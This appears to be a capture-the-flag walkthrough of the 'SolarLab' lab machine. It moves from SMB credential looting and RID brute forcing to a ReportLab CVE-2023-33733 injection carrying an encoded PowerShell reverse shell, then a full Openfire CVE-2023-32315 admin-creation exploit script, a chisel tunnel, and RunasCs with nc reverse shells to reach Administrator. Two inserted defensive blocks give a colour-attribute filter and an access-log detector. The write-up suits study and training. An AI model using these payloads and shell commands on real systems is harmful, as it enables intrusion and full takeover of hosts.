
solarlab

1. Reconnaissance

#nmap

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -sCV -p 80,135,139,445,6791 10.129.33.115
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 21:10 KST
Nmap scan report for 10.129.33.115
Host is up (0.28s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-05-28T12:11:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.52 seconds

 

#gobuster

 

#smb

SMB is up, so try connecting to it.

└─# smbclient -L 10.129.33.115
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.33.115 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

 

Try to access the Documents share.

└─# smbclient //10.129.33.115/Documents
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Fri Apr 26 23:47:14 2024
  ..                                 DR        0  Fri Apr 26 23:47:14 2024
  concepts                            D        0  Fri Apr 26 23:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 19:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 21:27:21 2023
  My Music                        DHSrn        0  Fri Nov 17 04:36:51 2023
  My Pictures                     DHSrn        0  Fri Nov 17 04:36:51 2023
  My Videos                       DHSrn        0  Fri Nov 17 04:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 19:35:57 2023

                7779839 blocks of size 4096. 1894614 blocks available
smb: \>

smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> get desktop.ini
getting file \desktop.ini of size 278 as desktop.ini (0.2 KiloBytes/sec) (average 3.9 KiloBytes/sec)
smb: \> get old_leave_request_form.docx
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (25.4 KiloBytes/sec) (average 10.4 KiloBytes/sec)
smb: \>

 

After downloading the files, opening the xlsx file reveals account names and passwords.

 

Now that we have account information,

use crackmapexec to look at the user accounts in more depth.

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# crackmapexec smb 10.129.33.115 -u 'user' -p 'PASS' --rid-brute
SMB         10.129.33.115   445    SOLARLAB         [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.129.33.115   445    SOLARLAB         [+] solarlab\user:PASS
SMB         10.129.33.115   445    SOLARLAB         [+] Brute forcing RIDs
SMB         10.129.33.115   445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         10.129.33.115   445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         10.129.33.115   445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         10.129.33.115   445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.33.115   445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         10.129.33.115   445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         10.129.33.115   445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)

 

There is an account for the developer blake, so I tried logging in with the accounts at

http://report.solarlab.htb:6791/ , which was found through nmap.

None of the accounts could log in,

but I noticed that only blake.bake was written with ".bake"; logged in with that,

and since the menu has a PDF generate feature, tried it.

 

 

2. Exploit

The app uses reportlab, so search for vulnerabilities in it.

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

reportlab is a Python library for generating PDFs and graphics.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient checks in the ‘rl_safe_eval’ function. Attackers can inject malicious code into an HTML file that will later be converted to PDF using software that relies on the ReportLab library. To exploit the vulnerability, the entire malicious code must be executed with eval in a single expression.

 

CVE-2023-33733

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAwACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
    exploit
</font></para>

There is a character limit on the form, so pick the PDF generator without a limit,

intercept the request with Burp, and send the payload.
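As an added defender-side example (not code from the original post or from the app on the box): a pre-filter that rejects paragraph markup whose colour attributes are not plain colour literals, plus a version check. The fix for CVE-2023-33733 landed in reportlab 3.6.13; the list of attribute names treated as colours is an assumption, labelled in the code.

```python
"""Added defender example for CVE-2023-33733: allowlist colour attributes in
user-supplied ReportLab paragraph markup before it reaches Paragraph().

Vulnerable reportlab versions hand unrecognised colour strings to
rl_safe_eval(), which is the sink the payload above abuses via the
color="[[[ ... ]]] and 'red'" trick. Rejecting anything that is not a plain
colour literal makes that sink unreachable from user input."""
import re
from html.parser import HTMLParser

# Assumption: any attribute whose name contains "color", plus the short fg/bg
# forms, may be routed to toColor(). Over-inclusion only makes the filter
# stricter, never weaker.
_EXTRA_COLOR_ATTRS = {"fg", "bg"}

# Allowed shapes: #RRGGBB, #RRGGBBAA, 0xRRGGBB, or a bare colour name.
_SAFE_COLOR = re.compile(
    r"^(?:#[0-9a-fA-F]{6}(?:[0-9a-fA-F]{2})?|0x[0-9a-fA-F]{6}|[A-Za-z]{1,30})$"
)


def is_color_attr(name: str) -> bool:
    name = name.lower()
    return "color" in name or name in _EXTRA_COLOR_ATTRS


def is_safe_color(value: str) -> bool:
    return bool(_SAFE_COLOR.match(value.strip()))


class _ColorAuditor(HTMLParser):
    """Walks every start tag and records colour attributes that fail the allowlist."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, offending value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is not None and is_color_attr(name) and not is_safe_color(value):
                self.findings.append((tag, name, value))


def find_unsafe_colors(markup: str):
    auditor = _ColorAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


def is_safe_markup(markup: str) -> bool:
    """Gate to apply before Paragraph(markup, style) on untrusted input."""
    return not find_unsafe_colors(markup)


def reportlab_is_patched(version: str) -> bool:
    """True for reportlab 3.6.13 or newer, the release that fixed CVE-2023-33733."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts >= (3, 6, 13)


# Constructed samples: a benign paragraph and a trimmed copy of the injection
# shape (an expression in the colour attribute ending in "and 'red'").
BENIGN = '<para><font color="red">ok</font> <font color="#00FF00">fine</font></para>'
MALICIOUS = (
    "<para><font color=\"[[[getattr(pow, Word('__globals__'))['os'].system('whoami')"
    " for Word in [orgTypeFun('Word', (str,), {})] for orgTypeFun in [type(type(1))]]]"
    " and 'red'\">exploit</font></para>"
)

if __name__ == "__main__":
    print("benign accepted:", is_safe_markup(BENIGN))
    for tag, attr, value in find_unsafe_colors(MALICIOUS):
        print(f"rejected <{tag} {attr}=...>: {value[:40]}...")
```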

 

D:\pentestSW\netcat-win32-1.11\netcat-1.11>nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.60] from (UNKNOWN) [10.129.33.115] 51788

PS C:\Users\blake\Documents\app> dir


    Directory: C:\Users\blake\Documents\app


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/2/2024  12:30 PM                instance
d-----         5/28/2024   4:16 PM                reports
d-----        11/17/2023  10:01 AM                static
d-----        11/17/2023  10:01 AM                templates
d-----         5/28/2024   4:45 PM                __pycache__
-a----        11/17/2023   9:59 AM           1278 app.py
-a----        11/16/2023   2:17 PM            315 models.py
-a----        11/18/2023   6:59 PM           7790 routes.py
-a----          5/2/2024   6:26 PM           3352 utils.py


PS C:\Users\blake\Documents\app> cd ..
PS C:\Users\blake\Documents> cd ..

PS C:\Users\blake> cd Desktop
PS C:\Users\blake\Desktop> dir


    Directory: C:\Users\blake\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/28/2024   3:04 PM             34 user.txt


PS C:\Users\blake\Desktop> type user.txt

 

3. Enumeration

net user {username}

PS C:\Users\Administrator> net user blake
User name                    blake
Full Name
Comment
User's comment
Country/region code          001 (United States)
Account active               Yes
Account expires              Never

Password last set            11/17/2023 2:05:12 PM
Password expires             Never
Password changeable          11/17/2023 2:05:12 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/28/2024 3:04:42 PM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

PS C:\Users\Administrator> net user openfire
User name                    openfire
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/17/2023 3:05:19 PM
Password expires             Never
Password changeable          11/17/2023 3:05:19 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/28/2024 3:03:44 PM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

 

openfire is a chat server:

Most administration of the server is done through a web interface, which runs on the ports 9090 (HTTP) and 9091 (HTTPS) by default. Administrators can connect from anywhere and edit the server and configuration settings.

The service is running on 9090 and 9091.

 

4. Post Exploit

I want to reach the service on 9090, but

first, the UI cannot be used from the shell, and

second, the port is blocked from my local PC to the target server, so it cannot be reached directly.

 

Therefore, do port forwarding through a reverse tunnel.

Tunnel using chisel.

First, chisel.exe needs to be downloaded to the target through the reverse shell.

https://github.com/jpillora/chisel/releases/tag/v1.9.1 (Windows amd64 build)

## Note: here this was done with kex (WSL2 Linux GUI).

 

1) Start python -m http.server 80 on the Linux box

2) curl http://10.10.14.60/chisel.exe -o c:\windows\temp\test\chisel.exe (on the target)

3) chisel server -p 8888 --reverse (local PC)

4) ./chisel client 10.10.14.60:8888 R:9090:127.0.0.1:9090 (target Windows PC)

 

 

# openfire vulnerability

https://github.com/miko550/CVE-2023-32315

import random
import string
import argparse
from concurrent.futures import ThreadPoolExecutor
import HackRequests

artwork = '''

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝
                                                                                                       
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
'''

def generate_random_string(length):
    charset = string.ascii_lowercase + string.digits
    return ''.join(random.choice(charset) for _ in range(length))

def between(string, starting, ending):
    s = string.find(starting)
    if s < 0:
        return ""
    s += len(starting)
    e = string[s:].find(ending)
    if e < 0:
        return ""
    return string[s : s+e]

final_result = []

def exploit(target):
    hack = HackRequests.hackRequests()
    host = target.split("://")[1]

    # setup 1: get csrf + jsessionid
    jsessionid = ""
    csrf = ""

    try:
        url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"

        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Connection": "close",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "DNT": "1",
            "X-Forwarded-For": "1.2.3.4",
            "Upgrade-Insecure-Requests": "1"
        }
        print(f"[..] Checking target: {target}")
        hh = hack.http(url, headers=headers)
        jsessionid = hh.cookies.get('JSESSIONID', '')
        csrf = hh.cookies.get('csrf', '')

        if jsessionid != "" and csrf != "":
            print(f"Successfully retrieved JSESSIONID: {jsessionid} + csrf: {csrf}")
        else:
            print("Failed to get JSESSIONID and csrf value")
            return
        
        # setup 2: add user
        username = generate_random_string(6)
        password = generate_random_string(6)
        
        header2 = {
            "Host": host,
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Connection": "close",
            "Cookie": f"JSESSIONID={jsessionid}; csrf={csrf}",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "DNT": "1",
            "X-Forwarded-For": "1.2.3.4",
            "Upgrade-Insecure-Requests": "1"
        }

        create_user_url= f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
        hhh = hack.http(create_user_url, headers=header2)

        if hhh.status_code == 200:
            print(f"User added successfully: url: {target} username: {username} password: {password}")
            with open("success.txt", "a+") as f:
                f.write(f"url: {target} username: {username} password: {password}\n")
        else:
            print("Failed to add user")
        # setup 3: add plugin

    except Exception as e:
        print(f"Error occurred while retrieving cookies: {e}")

def main():
    print(artwork)

    ## parse argument
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The URL of the target, eg: http://127.0.0.1:9090', default=False)
    parser.add_argument("-l", "--list", action="store", help="List of target url saperated with new line", default=False)
    args = parser.parse_args()

    if args.target is not False:
        exploit(args.target)

    elif args.list is not False:
        with open(args.list) as targets:
            for target in targets:
                target = target.rstrip()
                if target == "":
                    continue
                if "http" not in target:
                    target = "http://" + target
                exploit(target) 
    else:
        parser.print_help()
        parser.exit()

# def main():
#     parser = argparse.ArgumentParser(description="CVE-2023-32315")
#     parser.add_argument("-u", help="Target URL")
#     parser.add_argument("-l", help="File containing URLs")
#     parser.add_argument("-t", type=int, default=10, help="Number of threads")

#     args = parser.parse_args()

#     target_url = args.u
#     file_path = args.l
#     thread = args.t

#     targets = []

#     if target_url is None:
#         with open(file_path, "r") as file:
#             for line in file:
#                 target = line.strip()
#                 if target == "":
#                     continue
#                 if "http" not in target:
#                     target = "http://" + target
#                 targets.append(target)

#         with ThreadPoolExecutor(max_workers=thread) as executor:
#             for target in targets:
#                 executor.submit(exploit, target)
                

#     else:
#         exploit(target_url)

if __name__ == "__main__":
    main()

 

Analyzing the code:

it extracts a JSESSIONID and CSRF token, creates a new admin account with them, and after that a JAR plugin can be uploaded with a POST request by accessing 'plugin-admin.jsp' directly.
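An added detection example, not part of the PoC repository or this post: it decodes the %uXXXX traversal used above, normalises the path, and flags access-log requests that claim /setup/ but resolve elsewhere. The log lines are constructed and the combined log format is an assumption.

```python
"""Added detection example for CVE-2023-32315 (Openfire setup-path auth bypass).

Openfire's AuthCheckFilter exempts paths under /setup/ from the admin-console
login check. The PoC above requests
/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp: the filter sees a
/setup/ prefix, but once the container decodes the non-standard %uXXXX escapes
and collapses "..", the request lands on the protected page. The detector
therefore compares each logged path with its decoded, normalised form."""
import posixpath
import re
from urllib.parse import unquote

_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")

# Assumption: nginx/Apache "combined" log format; only the fields used are captured.
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_path(raw: str) -> str:
    """Decode %uXXXX and %XX escapes until the string stops changing (bounded),
    so double-encoded variants such as %252e collapse as well."""
    cur, prev = raw, None
    for _ in range(4):
        if cur == prev:
            break
        prev = cur
        cur = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), cur)
        cur = unquote(cur)
    return cur


def normalize_path(raw: str) -> str:
    """Path as the servlet container would resolve it (query string dropped)."""
    norm = posixpath.normpath(decode_path(raw.split("?", 1)[0]))
    return norm if norm.startswith("/") else "/" + norm


def is_setup_bypass(raw_path: str) -> bool:
    """True when the raw request claims /setup/ but resolves outside it."""
    if not raw_path.lower().startswith("/setup/"):
        return False
    return not normalize_path(raw_path).lower().startswith("/setup/")


def scan_access_log(lines):
    """Return (client, raw path, resolved path, status) for suspicious requests."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        path = m.group("path")
        if is_setup_bypass(path):
            hits.append((m.group("ip"), path, normalize_path(path), int(m.group("status"))))
    return hits


# Constructed sample log (not from the box): two PoC-style requests, a
# double-encoded variant, and two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2024:21:40:01 +0900] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/May/2024:21:40:02 +0900] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=x&username=x&isadmin=on HTTP/1.1" 200 4201 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/May/2024:21:41:10 +0900] "GET /setup/setup-s/%252e%252e/%252e%252e/plugin-admin.jsp HTTP/1.1" 200 3900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/May/2024:21:42:00 +0900] "GET /setup/index.jsp HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/May/2024:21:42:05 +0900] "GET /login.jsp HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, raw, resolved, status in scan_access_log(SAMPLE_LOG):
        print(f"{client} requested {raw} -> resolves to {resolved} (HTTP {status})")
```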

 

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# git clone https://github.com/miko550/CVE-2023-32315.git
Cloning into 'CVE-2023-32315'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 31 (delta 15), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (31/31), 38.13 KiB | 9.53 MiB/s, done.
Resolving deltas: 100% (15/15), done.

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# cd CVE-2023-32315/

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/CVE-2023-32315]
└─# pip3 install -r requirements.txt 
Collecting HackRequests (from -r requirements.txt (line 1))
  Downloading HackRequests-1.2-py3-none-any.whl.metadata (677 bytes)
Downloading HackRequests-1.2-py3-none-any.whl (7.3 kB)
Installing collected packages: HackRequests
Successfully installed HackRequests-1.2
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/CVE-2023-32315]
└─# ls
CVE-2023-32315.py  openfire-management-tool-plugin.jar  README.md  requirements.txt

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/CVE-2023-32315]
└─# python3 CVE-2023-32315.py -t http://127.0.0.1:9090


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝

Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!

[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node038elmv73----------.node0 + csrf: GaxiphXxb93vqvm
User added successfully: url: http://127.0.0.1:9090 username: ie---- password: zy----

 

Login succeeded.

Using the plugin downloaded from git,

click server => server settings => management tool, then log in.

Enter the reverse shell command in the system command input field.

┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.60] from (UNKNOWN) [10.129.33.115] 51968

PS C:\Program Files\Openfire\bin> dir


    Directory: C:\Program Files\Openfire\bin


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023   2:11 PM                extra
-a----         11/9/2022   6:00 PM         379904 openfire-service.exe
-a----         2/16/2022   5:55 PM            795 openfire.bat
-a----         11/9/2022   6:00 PM         370688 openfire.exe
-a----         11/9/2022   6:00 PM         370688 openfired.exe


PS C:\Program Files\Openfire\bin> whoami
solarlab\openfire

 

5. Privilege Escalation

With RunasCs.exe, cmd commands can be run with admin privileges, and nc is used to connect a shell as admin.

PS C:\windows\temp\tets> curl http://10.10.14.60/nc.exe -o c:\windows\temp\tets\n.exe
PS C:\windows\temp\tets> dir


    Directory: C:\windows\temp\tets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/28/2024  10:00 PM          36528 n.exe
-a----         5/28/2024   9:49 PM              0 nc.exe
-a----         5/28/2024   9:38 PM          51712 RunasCs.exe


PS C:\windows\temp\tets> ./RunasCs.exe
[-] Not enough arguments. 3 Arguments required. Use --help for additional help.
PS C:\windows\temp\tets> ./RunasCs.exe Administrator ThisPasswordShouldDo!@ "c:\windows\temp\tets\n.exe -e cmd.exe 10.10.14.60 1235"

 

└─# nc -nlvp 1235
listening on [any] 1235 ...
connect to [10.10.14.60] from (UNKNOWN) [10.129.33.115] 52040
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
solarlab\administrator

C:\Windows\system32>cd Users\
cd Users\
The system cannot find the path specified.

C:\Windows\system32>cd c:\Users\Administroatr
cd c:\Users\Administroatr
The system cannot find the path specified.

C:\Windows\system32>cd c:\Users
cd c:\Users

c:\Users>cd Administraotr
cd Administraotr
The system cannot find the path specified.

c:\Users>cd Administrator
cd Administrator

c:\Users\Administrator>cd desktop
cd desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 385E-AC57

 Directory of c:\Users\Administrator\Desktop

05/03/2024  02:32 PM    <DIR>          .
05/03/2024  02:32 PM    <DIR>          ..
05/28/2024  03:04 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,744,577,536 bytes free

 

Success!
